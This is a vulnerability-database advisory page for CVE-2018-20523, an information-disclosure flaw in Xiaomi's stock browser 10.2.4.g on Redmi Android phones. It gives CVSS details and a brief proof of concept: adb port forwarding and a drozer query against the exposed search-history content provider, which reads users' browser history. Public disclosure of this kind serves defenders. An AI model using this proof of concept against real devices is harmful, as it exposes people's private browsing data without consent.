Xiaomi 10.2.4.g Information Disclosure

2021.08.12
Credit: Vishwaraj101
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-200


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

# Exploit Title: Xiaomi browser 10.2.4.g - Browser Search History Disclosure # Date: 27-Dec-2018 # Exploit Author: Vishwaraj101 # Vendor Homepage: https://www.mi.com/us # Software Link: https://www.apkmirror.com/apk/xiaomi-inc/mi-browse/mi-browse-10-2-4-release/ # Version: 10.2.4.g # Tested on: Tested in Android Version: 8.1.0 # CVE : CVE-2018-20523 *summary: * Xiaomi Stock Browser 10.2.4.g on Xiaomi Redmi Note 5 Pro devices and other Redmi Android phones were vulnerable to content provider injection using which any 3rd party application can read the user’s browser history. *Vulnerable component:* com.android.browser.searchhistory *Poc:* adb forward tcp:31415 tcp:31415 drozer console connect drozer > run app.provider.query content://com.android.browser.searchhistory/searchhistory *Blogpost:* https://vishwarajbhattrai.wordpress.com/2019/03/22/content-provider-injection-in-xiaomi-stock-browser/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top